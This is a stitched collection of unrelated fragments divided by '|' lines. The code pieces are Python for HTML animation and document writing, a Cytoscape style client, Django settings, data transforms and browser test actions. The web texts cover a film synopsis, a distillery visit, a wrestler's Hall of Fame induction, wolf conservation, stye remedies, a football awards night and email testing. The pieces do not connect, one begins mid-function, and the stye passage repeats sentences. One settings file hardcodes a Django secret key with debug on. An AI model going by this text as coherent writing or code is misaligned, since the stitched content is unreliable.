signature_def = '%s(%s)' % (method, ', '.join(allargs))
signature_call = '%s(%s)' % (method, ', '.join(a[0][1:])) # exclude self
code = """\
def _%s:
'''\
%s
'''
for writer in self.writers:
writer.%s
func_to_method(_%s, DocWriter, '%s')
""" % (signature_def, docstring, signature_call, method, method)
#print 'Autogenerating\n', code
exec code
def html_movie(plotfiles, interval_ms=300, width=800, height=600,
casename=None):
"""
Takes a list plotfiles, such as::
'frame00.png', 'frame01.png', ...
and creates javascript code for animating the frames as a movie in HTML.
The `plotfiles` argument can be of three types:
* A Python list of the names of the image files, sorted in correct
order. The names can be filenames of files reachable by the
HTML code, or the names can be URLs.
* A filename generator using Unix wildcard notation, e.g.,
``frame*.png`` (the files most be accessible for the HTML code).
* A filename generator using printf notation for frame numbering
and limits for the numbers. An example is ``frame%0d.png:0->92``,
which means ``frame00.png``, ``frame01.png``, ..., ``frame92.png``.
This specification of `plotfiles` also allows URLs, e.g.,
``http://mysite.net/files/frames/frame_%04d.png:0->320``.
If `casename` is None, a casename based on the full relative path of the
first plotfile is used as tag in the variables in the javascript code
such that the code for several movies can appear in the same file
(i.e., the various code blocks employ different variables because
the variable names differ).
The returned result is text strings that incorporate javascript to
loop through the plots one after another. The html text also features
buttons for controlling the movie.
The parameter `iterval_ms` is the time interval between loading
successive images and is in milliseconds.
The `width` and `height` parameters do not seem to have any effect
for reasons not understood.
The following strings are returned: header, javascript code, form
with movie and buttons, footer, and plotfiles::
header, jscode, form, footer, plotfiles = html_movie('frames*.png')
# Insert javascript code in some HTML file
htmlfile.write(jscode + form)
# Or write a new standalone file that act as movie player
filename = plotfiles[0][:-4] + '.html'
htmlfile = open(filename, 'w')
htmlfile.write(header + jscode + form + footer)
htmlfile.close
This function is based on code written by R. J. LeVeque, based on
a template from Alan McIntyre.
"""
# Alternative method:
# http://stackoverflow.com/questions/9486961/animated-image-with-javascript
# Start with expanding plotfiles if it is a filename generator
if not isinstance(plotfiles, (tuple,list)):
if not isinstance(plotfiles, (str,unicode)):
raise TypeError('plotfiles must be list or filename generator, not %s' % type(plotfiles))
filename_generator = plotfiles
if '*' in filename_generator:
# frame_*.png
if filename_generator.startswith('http'):
raise ValueError('Filename generator %s cannot contain *; must be like http://some.net/files/frame_%%04d.png:0->120' % filename_generator)
plotfiles = glob.glob(filename_generator)
if not plotfiles:
raise ValueError('No plotfiles on the form %s' %
filename_generator)
plotfiles.sort()
elif '->' in filename_generator:
# frame_%04d.png:0->120
# http://some.net/files/frame_%04d.png:0->120
p = filename_generator.split(':')
filename = ':'.join(p[:-1])
if not re.search(r'%0?\d+', filename):
raise ValueError('Filename generator %s has wrong syntax; missing printf specification as in frame_%%04d.png:0->120' % filename_generator)
if not re.search(r'\d+->\d+', p[-1]):
raise ValueError('Filename generator %s has wrong syntax; must be like frame_%%04d.png:0->120' % filename_generator)
p = p[-1].split('->')
lo, hi = int(p[0]), int(p[1])
plotfiles = [filename % i for i in range(lo,hi+1,1)]
# Check that the plot files really exist, if they are local on the computer
if not plotfiles[0].startswith('http'):
missing_files = [fname for fname in plotfiles
if not os.path.isfile(fname)]
if missing_files:
raise ValueError('Missing plot files: %s' %
str(missing_files)[1:-1])
if casename is None:
# Use plotfiles[0] as the casename, but remove illegal
# characters in variable names since the casename will be
# used as part of javascript variable names.
casename = os.path.splitext(plotfiles[0])[0]
# Use _ for invalid characters
casename = re.sub('[^0-9a-zA-Z_]', '_', casename)
# Remove leading illegal characters until we find a letter or underscore
casename = re.sub('^[^a-zA-Z_]+', '', casename)
filestem, ext = os.path.splitext(plotfiles[0])
if ext == '.png' or ext == '.jpg' or ext == '.jpeg' or ext == 'gif':
pass
else:
raise ValueError('Plotfiles (%s, ...) must be PNG, JPEG, or GIF files with '\
'extension .png, .jpg/.jpeg, or .gif' % plotfiles[0])
header = """\
<html>
<head>
</head>
<body>
"""
no_images = len(plotfiles)
jscode = """
<script language="Javascript">
<!---
var num_images_%(casename)s = %(no_images)d;
var img_width_%(casename)s = %(width)d;
var img_height_%(casename)s = %(height)d;
var interval_%(casename)s = %(interval_ms)d;
var images_%(casename)s = new Array();
function preload_images_%(casename)s()
{
t = document.getElementById("progress");
""" % vars()
i = 0
for fname in plotfiles:
jscode += """
t.innerHTML = "Preloading image ";
images_%(casename)s[%(i)s] = new Image(img_width_%(casename)s, img_height_%(casename)s);
images_%(casename)s[%(i)s].src = "%(fname)s";
""" % vars()
i = i+1
jscode += """
t.innerHTML = "";
}
function tick_%(casename)s()
{
if (frame_%(casename)s > num_images_%(casename)s - 1)
frame_%(casename)s = 0;
document.name_%(casename)s.src = images_%(casename)s[frame_%(casename)s].src;
frame_%(casename)s += 1;
tt = setTimeout("tick_%(casename)s()", interval_%(casename)s);
}
function startup_%(casename)s()
{
preload_images_%(casename)s();
frame_%(casename)s = 0;
setTimeout("tick_%(casename)s()", interval_%(casename)s);
}
function stopit_%(casename)s()
{ clearTimeout(tt); }
function restart_%(casename)s()
{ tt = setTimeout("tick_%(casename)s()", interval_%(casename)s); }
function slower_%(casename)s()
{ interval_%(casename)s = interval_%(casename)s/0.7; }
function faster_%(casename)s()
{ interval_%(casename)s = interval_%(casename)s*0.7; }
// --->
</script>
""" % vars()
plotfile0 = plotfiles[0]
form = """
<form>
<input type="button" value="Start movie" onClick="startup_%(casename)s()">
<input type="button" value="Pause movie" onClick="stopit_%(casename)s()">
<input type="button" value="Restart movie" onClick="restart_%(casename)s()">
<input type="button" value="Slower" onClick="slower_%(casename)s()">
<input type="button" value="Faster" onClick="faster_%(casename)s()">
</form>
<p><div ID="progress"></div></p>
<img src="%(plotfile0)s" name="name_%(casename)s" border=2/>
""" % vars()
footer = '\n</body>\n</html>\n'
return header, jscode, form, footer, plotfiles
def html_movie_embed(moviefile, width=400, height=400):
"""
Return HTML for embedding a moviefile using the default
handling of such files.
"""
text = """
<embed src="%(moviefile)s"
width="%(width)s"
height="%(height)s"
autoplay="false"
loop="true">
</embed>
""" % vars()
return text
def html_movie_embed_wmp(moviefile, width=400, height=400):
"""Return HTML text for embedding a movie file
(Windows Media Player code)."""
text = """
<object id="MediaPlayer1" width="180" height="200"
classid="CLSID:22D6F312-B0F6-11D0-94AB-0080C74C7E95"
codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,701"
standby="Loading Microsoft Windows Media Player components..."
type="application/x-oleobject" align="middle">
<param name="FileName" value="%(moviefile)s">
<param name="ShowStatusBar" value="True">
<param name="DefaultFrame" value="mainFrame">
<param name="autostart" value="false">
<embed type="application/x-mplayer2"
pluginspage = "http://www.microsoft.com/Windows/MediaPlayer/"
src="%(moviefile)s"
autostart="false"
align="middle"
width="%(width)s"
height="%(height)s"
loop="100"
defaultframe="rightFrame"
showstatusbar="true">
</embed>
</object>
<!--
<a href="%(moviefile)s"><font size="2">Download movie file</font></a>
<a href="http://www.microsoft.com/windows/windowsmedia/mp10/default.aspx">
<font size="1">Download Windows Media Player</font></a></p>
-->
<!--
Attributes of the <embed> tag are:
src - tells what file to use.
autostart="true" - tells the computer to start the Video playing upon loading the page.
autostart="false" - tells the computer not to start the Video playing upon loading the page. You must click the start button to make the Video play.
align=middle - tells the computer to put the start/stop buttons to the middle.
width= and height= - are the dimensions of a small button panel that will appear when the page loads and contains both a START & STOP button so the visitor can start/stop the Video.
loop=2 - will play the Video for two complete loops.
-->
""" % vars()
return text
def html_movie_embed_qt(moviefile, width=400, height=400):
"""Return HTML for embedding a moviefile (QuickTime code)."""
text = """
<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
codebase="http://www.apple.com/qtactivex/qtplugin.cab"
width="%(width)s" height="%(height)s" >
<param name="src" value="%(moviefile)s" >
<param name="autoplay" value="false" >
<embed src="%(moviefile)s"
pluginspage="http://www.apple.com/quicktime/download"
width="%(width)s" height="%(height)s" autoplay="false">
</embed>
</object>
""" % vars()
return text
def _test(d):
# d is formatclass() or DocWriter(HTML, LaTeX, ...)
print '\n\n', '*'*70, \
'\n*** Testing class "%s"\n' % d.__class__.__name__, '*'*70
d.title('My Test of Class %s' % d.__class__.__name__,
[('Hans Petter Langtangen',
'Simula Research Laboratory',
'Dept. of Informatics, Univ. of Oslo'),
])
d.section('First Section')
d.text("""
Here is some
text for section 1.
This is a *first* example of using the _DocWriter
module_ for writing documents from *Python* scripts.
It could be a nice tool since we do not need to bother
with special typesetting, such as `fixed width fonts`
in plain text.
""")
d.subsection('First Subsection')
d.text('Some text for the subsection.')
d.paragraph('Test of a Paragraph')
d.text("""
Some paragraph text taken from "Documenting Python": The Python language
has a substantial body of documentation, much of it contributed by various
authors. The markup used for the Python documentation is based on
LaTeX and requires a significant set of macros written specifically
for documenting Python. This document describes the macros introduced
to support Python documentation and how they should be used to support
a wide range of output formats.
This document describes the document classes and special markup used
in the Python documentation. Authors may use this guide, in
conjunction with the template files provided with the distribution, to
create or maintain whole documents or sections.
If you're interested in contributing to Python's documentation,
there's no need to learn LaTeX if you're not so inclined; plain text
contributions are more than welcome as well.
""")
d.text('Here is an enumerate list:')
samplelist = ['item1', 'item2',
['subitem1', 'subitem2'],
'item3',
['subitem3', 'subitem4']]
d.list(samplelist, listtype='enumerate')
d.text('...with some trailing text.')
d.subsubsection('First Subsubsection with an Itemize List')
d.list(samplelist, listtype='itemize')
d.text('Here is some Python code:')
d.verbatim("""
class A:
pass
class B(A):
pass
b = B()
b.item = 0 # create a new attribute
""")
d.section('Second Section')
d.text('Here is a description list:')
d.list(['keyword1: item1', 'keyword2: item2 goes here, with a colon : and some text after',
['key3: subitem1', 'key4: subitem2'],
'key5: item3',
['key6: subitem3', 'key7: subitem4']],
listtype='description')
d.paragraph_separator()
d.text('And here is a table:')
d.table([['a', 'b'], ['c', 'd'], ['e', 'and a longer text']])
print d
d.write_to_file('tmp_%s' % d.__class__.__name__)
if __name__ == '__main__':
formats = HTML, DocOnce
for format in formats:
d = format()
_test(d)
formats_str = [format.__name__ for format in formats]
d = DocWriter(*formats_str)
_test(d)
|
Annie is a young, happy foster kid who's also tough enough to make her way on the streets of New York in 2014. Originally left by her parents as a baby with the promise that they'd be back for her someday, it's been a hard knock life ever since with her mean foster mom Miss Hannigan. But everything's about to change when the hard-nosed tycoon and New York mayoral candidate Will Stacks makes a thinly-veiled campaign move and takes her in.
|
from . import BASE_URL, HEADERS
import requests
import json
import pandas as pd
import warnings
warnings.warn('\n\n\n**** data.style will be deprecated in the next py2cytoscape release. ****\n\n\n')
class Style(object):
def __init__(self, name):
# Validate required argument
if name is None:
raise ValueError("Style name is required.")
else:
self.__name = name
self.__url = BASE_URL + 'styles/' + str(name) + '/'
def get_name(self):
"""
Get immutable name of this Visual Style.
:return: Style name as string
"""
return self.__name
def __get_new_mapping(self, mapping_type, column=None, col_type='String',
vp=None):
if column is None or vp is None:
raise ValueError('both column name and visual property are required.')
new_maping = {
'mappingType': mapping_type,
'mappingColumn': column,
'mappingColumnType': col_type,
'visualProperty': vp
}
return new_maping
def create_discrete_mapping(self, column=None, col_type='String',
vp=None, mappings=None):
self.__call_create_mapping(
self.__get_discrete(column=column, col_type=col_type, vp=vp,
mappings=mappings))
def create_continuous_mapping(self, column=None, col_type='String',
vp=None, points=None):
self.__call_create_mapping(
self.__get_continuous(column=column, col_type=col_type, vp=vp,
points=points))
def create_passthrough_mapping(self, column=None, col_type='String',
vp=None):
self.__call_create_mapping(
self.__get_passthrough(column=column, col_type=col_type, vp=vp))
def __call_create_mapping(self, mapping):
url = self.__url + 'mappings'
requests.post(url, data=json.dumps([mapping]), headers=HEADERS)
def __get_passthrough(self, column=None, col_type='String', vp=None):
return self.__get_new_mapping('passthrough', column=column,
col_type=col_type, vp=vp)
def __get_discrete(self, column=None, col_type='String', vp=None,
mappings=None):
new_mapping = self.__get_new_mapping('discrete', column=column,
col_type=col_type, vp=vp)
if mappings is None:
raise ValueError('key-value pair object (mappings) is required.')
body = [{'key': key, 'value': mappings[key]} for key in mappings.keys()]
new_mapping['map'] = body
return new_mapping
def __get_continuous(self, column=None, col_type='String', vp=None,
points=None):
if points is None:
raise ValueError('key-value pair object (mappings) is required.')
new_mapping = self.__get_new_mapping('continuous', column=column,
col_type=col_type, vp=vp)
new_mapping['points'] = points
return new_mapping
def get_mapping(self, vp=None):
if vp is None:
raise ValueError('Visual Property ID is required.')
url = self.__url + 'mappings/' + vp
return requests.get(url).json()
def get_mappings(self):
url = self.__url + 'mappings'
return requests.get(url).json()
def get_default(self, vp=None):
if vp is None:
raise ValueError('Visual Property ID is required.')
url = self.__url + 'defaults/' + vp
key_value_pair = requests.get(url).content
print(key_value_pair)
key2 = requests.get(url).json()
key_value_pair = key2
return pd.Series({key_value_pair['visualProperty']: key_value_pair[
'value']})
def get_defaults(self):
url = self.__url + 'defaults'
result = requests.get(url).json()['defaults']
vals = {entry['visualProperty']: entry['value'] for entry in result}
return pd.Series(vals)
def update_defaults(self, prop_value_dict):
"""
Updates the value of one or more visual properties.
:param prop_value_dict: Dictionary containing, for each visual property,
the new value to use.
"""
body = []
for key in prop_value_dict:
entry = {
'visualProperty': key,
'value': prop_value_dict[key]
}
body.append(entry)
url = self.__url + 'defaults'
requests.put(url, data=json.dumps(body), headers=HEADERS)
# Delete Methods
def delete_mapping(self, vp=None):
if vp is None:
return
url = self.__url + 'mappings/' + vp
requests.delete(url)
def delete_mappings(self):
url = self.__url + 'mappings'
requests.delete(url)
class StyleUtil(object):
def create_point(value, lesser, equal, greater):
return [
{
'value': str(value),
'lesser': lesser,
'equal': equal,
'greater': greater
}
]
def create_2_color_gradient(min=0, max=10, colors=('red', 'green')):
point_1 = StyleUtil.create_point(min, colors[0], colors[0], colors[0])
point_2 = StyleUtil.create_point(max, colors[1], colors[1], colors[1])
return point_1 + point_2
def create_3_color_gradient(min=-5, mid=0, max=5, colors=('blue', 'white', 'red')):
# can be updated to use StyleUtil.create_point like in create_point
points = [
{
'value': str(min),
'lesser': colors[0],
'equal': colors[0],
'greater': colors[0],
},
{
'value': str(mid),
'lesser': colors[1],
'equal': colors[1],
'greater': colors[1],
},
{
'value': str(max),
'lesser': colors[2],
'equal': colors[2],
'greater': colors[2]
}
]
return points
def create_slope(min=0, max=10, values=(1, 10)):
point_1 = StyleUtil.create_point(min, values[0], values[0], values[0])
point_2 = StyleUtil.create_point(max, values[1], values[1], values[1])
return point_1 + point_2
|
Distilleries are always great attractions, and Dewar’s Aberfeldy Distillery is no different. There is more than just a guided tour of the distillery on offer, with the opportunity for visitors to relax in the café and whisky lounge.
The café offers great food all made from local produce with sandwiches, soups and afternoon tea available. Alternatively, you could choose to relax in the whisky lounge, purchasing a dram or tasting flight from the bar, all under the guidance of staff who really know their stuff when it comes to whisky.
The onsite distillery shop gives you the opportunity to buy from the full John Dewar & Sons Fine Whisky Emporium range. There’s also the exclusive single cask fill your own bottle option.
Dewar’s offers a range of great experiences, so they really do have all the bases covered. The photography and cask tasting tour is priced at £17, and you get the rare chance of photographing the whisky stills while tasting from a cask.
The distillery tour is £9.50 with an expert guide taking you around the distillery, and there’s a tasting opportunity in the whisky lounge. The cask tasting tour is £17, and you get the chance to taste the exclusive single malt with a complimentary glass on offer too. If you’re a whisky connoisseur, you may wish to buy a ticket for the specialist tour priced at £27. You get the chance to taste a range of the finest whiskies in the lounge. The blender’s tour is £75 with a full cask tour and then the chance to create your own blend to take home.
Dewar’s Aberfeldy Distillery is open seven days a week and is accessible by car with parking available on site.
|
"""LEAD common settings."""
# Imports
from pathlib import Path
# Project base directory
BASE_DIR = Path(__file__).absolute().parent.parent.parent
# Installed applications
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ckeditor',
'gl_site'
)
# Configure middleware
MIDDLEWARE = (
# Security
'django.middleware.security.SecurityMiddleware',
# Whitenoise
'whitenoise.middleware.WhiteNoiseMiddleware',
# Other
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
)
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Set Root url
ROOT_URLCONF = 'goodnight_lead.urls'
# Set WSGI application path
WSGI_APPLICATION = 'goodnight_lead.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static asset configuration
STATIC_ROOT = 'staticfiles'
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
STATICFILES_DIRS = (BASE_DIR / 'static',)
# We don't currently support uploading images from ckeditor, but we still
# need to define this variable
CKEDITOR_UPLOAD_PATH = 'ckeditor_uploads/'
# Default url for login page (override django default)
LOGIN_URL = '/login'
# Template configuration
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
]
},
},
]
|
Dumas will join a small and elite list of female grapplers such as the Fabulous Moolah, Mae Young, Sherri Martel and Wendi Richter into the heralded hall. Stratus, also a member (Class of 2013), has been chosen to induct her longtime rival and friend.
Dumas became an inspiration and idol for girls growing up watching her perform in the late 1990s into the new millennium. Among them was diva’s champion AJ Lee, who has cited Lita as a big reason she pursued a career in WWE. There is a video on YouTube of a teenage Lee getting emotional meeting Dumas for the first time. Today this lifelong fan is standing atop the WWE diva mountain, just like her idol did.
A lot has happened since Lita retired full-time from the ring.
Many of the women on the roster are being introduced to a new audience through the popular reality TV show “Total Divas” on E! Dumas, who came to WWE from experiences in Mexico, the independent scene and ECW, believes it’s almost bringing a different kind of attention.
Dumas’ career was filled with memorable moments from teaming with Matt and Jeff Hardy to working with Stratus. The two divas not only participated in a main event tag match involving Triple H and The Rock, but would headline their own Raw one-on-one almost a decade ago. She battled back from serious neck injuries and a torn ACL. Before retiring, Dumas was also an important part of Edge’s successful run with the WWE championship. Given all she has accomplished and sporadic appearances she has made for the company over the years, the verdict is out if we will see her compete again.
Dumas was Stratus’ last opponent as an active performer. Not long after, Mickie James was the final adversary for Lita at the 2006 Survivor Series. With that came the end of an era.
Since her time away from WWE, Dumas has been meeting fans at conventions, working on a few projects and enjoying her life. She recently appeared on CMT’s “Tattoo Titans” as a guest judge.
“That was actually the first thing I had done in a long time in the public eye,” Dumas said. “I was really reluctant. I had never watched the tattoo competition show or those reality shows. I did work in tattoo shops before I wrestled, so it was kind of fun to come back there. I ended up having a really good time with that crew. I’d like to do some more stuff with them. I talked to them about doing some more stuff. So you might be able to catch me on another ‘Tattoo Titans’ episode.
Dumas is excited for the upcoming WrestleMania Weekend in New Orleans. She anticipates the big showdown between The Undertaker and Brock Lesnar.
“It’s amazing that ‘Taker can still go out there and give not only a compelling show because you are still excited to see him, but there is still that hope or believability that somebody is going to break that streak,” Dumas said.
Dumas has gone from living in South Florida during her early years (until middle school) to living her dreams. She recalls happy times in Deerfield Beach and Boca Raton.
“I remember we’d walk down and sit there and talk about the ‘never did,’” Dumas said.
• Lita (Amy Dumas) joins the Ultimate Warrior, Mr. T, Carlos Colon, Paul Bearer, Razor Ramon and Jake The Snake Roberts in the 2014 Class of the WWE Hall of Fame from the Smoothie King Center in New Orleans. For the first time ever, the induction ceremony will air live in its entirety on the WWE Network at 9 p.m. EST Saturday, April 5.
• WrestleMania 30 will air 7 p.m. EST Sunday, April 6 from the Mercedes-Benz Superdome in New Orleans on pay-per-view and the WWE Network. Pre-show begins at 6 p.m. EST.
Visit www.WrestleMania.com for full card and details on everything surrounding the biggest spectacle in sports entertainment.
• Follow Lita on Twitter @AmyDumas.
• Follow me on Twitter @smFISHMAN for live tweets from New Orleans on WrestleMania Weekend.
|
from decimal import Decimal
from dimagi.ext.jsonobject import DictProperty, JsonObject, StringProperty
from corehq.apps.userreports.specs import TypeProperty
from corehq.apps.userreports.transforms.custom.date import get_month_display, days_elapsed_from_date
from corehq.apps.userreports.transforms.custom.numeric import \
get_short_decimal_display
from corehq.apps.userreports.transforms.custom.users import (
get_user_display,
get_owner_display,
get_user_without_domain_display,
)
class Transform(JsonObject):
"""
Transforms provide an interface to take in an input value and output something else.
Useful if you need to transform data before saving or displaying it in some way.
"""
type = StringProperty(required=True, choices=['custom'])
_CUSTOM_TRANSFORM_MAP = {
'month_display': get_month_display,
'days_elapsed_from_date': days_elapsed_from_date,
'user_display': get_user_display,
'owner_display': get_owner_display,
'user_without_domain_display': get_user_without_domain_display,
'short_decimal_display': get_short_decimal_display,
}
class CustomTransform(JsonObject):
"""
Custom transforms provide an interface to a limited set of known, custom operations
to transform data. Examples of custom transforms include things like looking up a username
or owner name from the ID.
"""
type = TypeProperty('custom')
custom_type = StringProperty(required=True, choices=_CUSTOM_TRANSFORM_MAP.keys())
def get_transform_function(self):
return _CUSTOM_TRANSFORM_MAP[self.custom_type]
def transform(self, value):
return self.get_transform_function()(value)
class DateFormatTransform(Transform):
type = TypeProperty('date_format')
format = StringProperty(required=True)
def get_transform_function(self):
def transform_function(value):
try:
return value.strftime(self.format)
except Exception:
return value
return transform_function
class NumberFormatTransform(Transform):
type = TypeProperty('number_format')
format_string = StringProperty(required=True)
def get_transform_function(self):
def transform_function(value):
try:
if isinstance(value, basestring):
value = Decimal(value)
return self.format_string.format(value)
except Exception:
return value
return transform_function
class TranslationTransform(Transform):
type = TypeProperty('translation')
translations = DictProperty()
def get_transform_function(self):
# For now, use the identity function
def transform_function(value):
return value
return transform_function
|
Current conservation policies might not be adequately protecting gray wolves (Canis lupus) in the Northern Rocky Mountains, according to recent research.
A team of researchers found that the wolves, which were reintroduced to the area in the mid-90s and later delisted from the Endangered Species Act in 2012, are now facing decreased survival and reproduction as well as smaller pack sizes.
As part of a study published in the journal Science, researchers examined the impact of hunting on wolf decline and distribution. The species went from having full protection under the Act to dealing with heavy human harvest, said Scott Creel, an ecology professor at Montana State University and lead author of the study.
|
"""
Django settings for CaptureRoyalTestServer project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'y&nd31a-z5c9@rgp-p47wvettq@%38(p9g7%oq#*q=2-aa$m5f'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'caproy',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'CaptureRoyalTestServer.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'CaptureRoyalTestServer.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
)
|
A stye or sty (hordeolum) is a red bump, sort of like a pimple, that forms on the outside edge of the eyelid. Your eyelids have lots of small oil glands, especially around the eyelashes.... Q. I�m constantly getting styes. How do I treat and prevent them? A. While uncomfortable, red, and painful, the good news is styes are usually harmless.
What May Trigger a Stye? Once you've had a stye or eye infection, it's important to replace your eye makeup, including your mascara and eye shadow, to prevent recurrence of an infection.... Any disease is easier to be prevented than to be cured. Stye is not an exception. Therefore, in order to prevent the disease and reduce the risk of recurrence, you should regularly improve the immunity, be physically active, avoid stress, hypothermia, and eat well.
How to stop a stye in its tracks. I think u should put a warm compress on it. I feel a stye coming on How can I prevent it. I am not sure you can prevent it, but to avoid having a really bad, painful one, use hot compresses. I also wash my eyelids with baby shampoo (the no-tears kind). Usually I warm up some water, dip cotton balls in and then hold them on my eyes until they get cold. I repeat... An eye stye (medical name is external hordeolum) is a painful red bump on the eyelid that becomes infected and causes a lot of irritation around the eye. The stye is caused by one or more oil glands in the eyelid becoming blocked which causes a buildup of bacteria. The end result is a swollen, and sometimes, painful bump on the eyelid filled up with pus.
10/11/2007�� Non-prescription products, however, cannont treat the infection associated with a sty, but can get temporary relief of its symptoms, including burning, stinging and itching. Rarely styes require lancing by a doctor.
McVey says there is no sure-fire way to prevent sties, but basic cleanliness is the top priority. Routine washing of hands and face is the best step for a lifetime of sty-free eyes. Routine washing of hands and face is the best step for a lifetime of sty-free eyes.
Your eye doctor can also address pain associated with styes. Sometimes, your eye doctor may choose to surgically open a large stye to relieve discomfort and prevent a serious infection. Sometimes, your eye doctor may choose to surgically open a large stye to relieve discomfort and prevent a serious infection.
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.core import util
from telemetry.core import exceptions
from telemetry.page import page as page_module
from telemetry.page.actions import page_action
class ClickElementAction(page_action.PageAction):
def __init__(self, attributes=None):
super(ClickElementAction, self).__init__(attributes)
def RunAction(self, page, tab, previous_action):
def DoClick():
assert hasattr(self, 'selector') or hasattr(self, 'text')
if hasattr(self, 'selector'):
code = 'document.querySelector(\'' + self.selector + '\').click();'
try:
tab.ExecuteJavaScript(code)
except exceptions.EvaluateException:
raise page_action.PageActionFailed(
'Cannot find element with selector ' + self.selector)
else:
callback_code = 'function(element) { element.click(); }'
try:
util.FindElementAndPerformAction(tab, self.text, callback_code)
except exceptions.EvaluateException:
raise page_action.PageActionFailed(
'Cannot find element with text ' + self.text)
if hasattr(self, 'wait_for_navigate'):
tab.PerformActionAndWaitForNavigate(DoClick)
elif hasattr(self, 'wait_for_href_change'):
old_url = tab.EvaluateJavaScript('document.location.href')
DoClick()
util.WaitFor(lambda: tab.EvaluateJavaScript(
'document.location.href') != old_url, 60)
else:
DoClick()
page_module.Page.WaitForPageToLoad(self, tab, 60)
tab.WaitForDocumentReadyStateToBeInteractiveOrBetter()
|
Ben Fidling claimed two titles as Horncastle Town held their end-of-season presentation night on Saturday.
Fidling got the nod from the dressing room and the the sidelines as he collected the Players’ Player of the Year and Supporters’ Player of the Year accolades.
Richard Jackson got the nod from Andrew Shinn and Mickey Stones as he was named as the Mangers’ Player of the Year.
And 17-year-old Elliot Andrew also got his hands on a trophy after winning the Young Player of the Year award.
|
import json
from django.core.exceptions import ImproperlyConfigured
from ..compat import NoReverseMatch, render, render_to_string, reverse
def render_embed(nodes=None, request=None):
context = {}
if nodes is None:
try:
prefix = request.build_absolute_uri("/").rstrip("/")
context.update(
{
"cms_url": prefix + reverse("admin:djedi:cms"),
"exclude_json_nodes": True,
}
)
output = render(request, "djedi/cms/embed.html", context)
except NoReverseMatch:
raise ImproperlyConfigured(
"Could not find djedi in your url conf, "
"enable django admin or include "
"djedi.urls within the admin namespace."
)
else:
context.update(
{
"cms_url": reverse("admin:djedi:cms"),
"exclude_json_nodes": False,
"json_nodes": json.dumps(nodes).replace("</", "\\x3C/"),
}
)
output = render_to_string("djedi/cms/embed.html", context)
return output
|
You’ve built an email and are ready to send it out to recipients? We strongly recommend that you send a test email to yourself to make sure that it looks exactly as you wanted both on mobile and desktop devices, with no rendering issues.
prior to sending a test email, please use our check-list to make sure that your email is done according to the email standards.
The HTML email preview shows how your email will render on recipients devices.
to get back to your template, click either “back to the editor” arrow or the “esc” button.
You cannot test the subject line and preheader text here.
Due to various devices dimensions, due to different rendering rules in numerous email clients, we cannot guarantee that your email will look exactly the same as shown in the preview mode.
To spread your built email among colleagues and clients for approval, you’ll need a shareable link.
above your email, click the “Copy” button or the “open in new tab” button.
Having opened this link in a new window, you’ll get to see your subject line and the preheader about the template.
In fact, it’s very easy to send test email with Stripo.
Please, test all the links in your email. How? Click each of them and see where it takes you to.
Like we previously said, you cannot test your sender name with Stripo. Yet, you can test the subject line and the preheader.
